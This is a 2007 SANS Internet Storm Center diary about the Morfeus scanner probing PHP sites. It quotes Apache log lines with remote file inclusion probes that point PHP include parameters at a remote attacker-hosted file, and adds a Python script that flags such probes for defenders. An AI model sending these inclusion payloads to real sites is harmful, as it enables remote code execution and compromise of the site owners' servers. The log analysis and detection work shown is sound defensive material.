
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2007-03-21



Must be the month of the PHP bugs... and Morfeus is trying them out

Published: 2007-03-21
Last Updated: 2007-03-21 22:10:43 UTC
by Arrigo Triulzi (Version: 1)
So, I assume by now you all know it is the "Month of the PHP bugs", but besides the tons of PHP advisories, what else have we been seeing?

Well, today fellow handler Jim Clausing started an interesting thread by posting his Apache logs, which contained lines upon lines of:

205.244.242.15 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
205.244.242.15 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"


So, curious whether Morfeus (which, incidentally, is an old tool) had been hitting my own systems as well, I went off to check my own logs:

tempest:~$ grep php www-access.log | grep Morfeus | cut -f 1 -d' ' | sort -n | uniq
207.44.165.5
tempest:~$ grep php www-access.log | grep Morfeus | wc -l
     104
tempest:~$

Aside from the scans coming from a different host, it is pretty clear that Morfeus has been on my boxes too.
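The grep pipeline above only answers "which IPs sent me Morfeus requests". What a handler usually wants next is the thing the two log lines actually show: query-string parameters whose value is a URL on somebody else's server, i.e. remote file inclusion (RFI) probes, regardless of which scanner's User-Agent is on the line. The following script is an added example and not part of the diary or of the handlers' tooling. It parses Apache combined-format lines, flags every URL-valued parameter, and summarises sources, the hosts the scanner tried to include from, and the agents seen. The sample log is constructed: the first two entries reproduce the lines quoted above, the rest (RFC 5737 addresses, the path /modules/mod_example/config.php) are made up to show a benign request, a probe from a non-Morfeus agent that got a 200, and a line that does not parse.

```python
"""Flag remote-file-inclusion probes in Apache access logs.

Added example for this diary, not the handlers' own code. Sample data is
constructed (see SAMPLE_LOG); hosts other than those in the diary are placeholders.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format; one regex group per field we use.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A parameter value that points at another server is the signature of an RFI
# probe: the scanner hopes the PHP script will include()/require() that URL.
# The trailing "?" in the probes turns anything the script appends (e.g.
# "/lang.php") into a query string for the attacker's server, so it is harmless.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed test data: lines 1-2 reproduce the diary's entries; lines 3-5 are
# invented (RFC 5737 addresses, a hypothetical mod_example path, and junk).
SAMPLE_LOG = """\
205.244.242.15 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
205.244.242.15 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
198.51.100.7 - - [21/Mar/2007:02:30:01 -0400] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [21/Mar/2007:03:11:09 -0400] "GET /modules/mod_example/config.php?absolute_path=https://192.0.2.99/x.txt? HTTP/1.0" 200 233 "-" "Mozilla/4.0"
this line is not an access-log entry
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def remote_params(target):
    """Yield (name, value) for every query parameter whose value is a remote URL.

    The query is split with partition() rather than urlsplit() so that odd
    targets (a second '?' inside the value, bracketed names such as
    CONFIG_EXT[...]) are handled without surprises.
    """
    _, _, query = target.partition("?")
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            yield name, value


def find_rfi_probes(log_text):
    """Scan an access log and return one finding per URL-valued parameter seen."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, url in remote_params(rec["target"]):
            findings.append({
                "src": rec["src"],
                "agent": rec["agent"],
                "path": rec["target"].partition("?")[0],
                "param": name,
                "include_url": url,
                "status": int(rec["status"]),
            })
    return findings


def summarise(findings):
    """The counters a handler wants first: who scanned, whose file they tried to include, which UA."""
    return {
        "sources": Counter(f["src"] for f in findings),
        "include_hosts": Counter(urlsplit(f["include_url"]).hostname for f in findings),
        "agents": Counter(f["agent"] for f in findings),
    }


def needs_attention(findings):
    """Probes the server did not reject: the targeted script exists, so go and look at it."""
    return [f for f in findings if f["status"] < 400]


if __name__ == "__main__":
    hits = find_rfi_probes(SAMPLE_LOG)
    for key, counter in summarise(hits).items():
        print(f"{key}: {dict(counter)}")
    for f in needs_attention(hits):
        print(f"CHECK {f['path']} ({f['param']} <- {f['include_url']}) from {f['src']}")
```

Two things to keep in mind when running this over a real log. The 404s in the diary's lines mean the scanner asked for a script that is not there; the entries worth an incident ticket are the ones where the same kind of request got a 200 (needs_attention), because then a copy of the extension exists and its include path may be attacker-controlled. And a URL-valued parameter is not proof of an attack: redirect or "return to" parameters on legitimate sites carry URLs too, so treat the findings as a triage list, not an alert on its own.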

First observation: Morfeus doesn't care about what you might have set your Apache ServerTokens to (which is still a good trick against Netcraft abusers but not against script kiddies). Mine is set to give nothing away (and no, PHP is not installed), but they still scanned me.

Second observation: this is such a "noisy" scan that Jim said he had turned off the Bleeding Edge Snort signatures and therefore only caught it when he got an alert from OSSEC (an open-source HIDS). It is never good news when signatures are turned off because they are too noisy, but, at least in this case, I think we can safely assume that Jim noticed the scans the first time round.

Third observation: if you are running a site with PHP this is not an enjoyable month...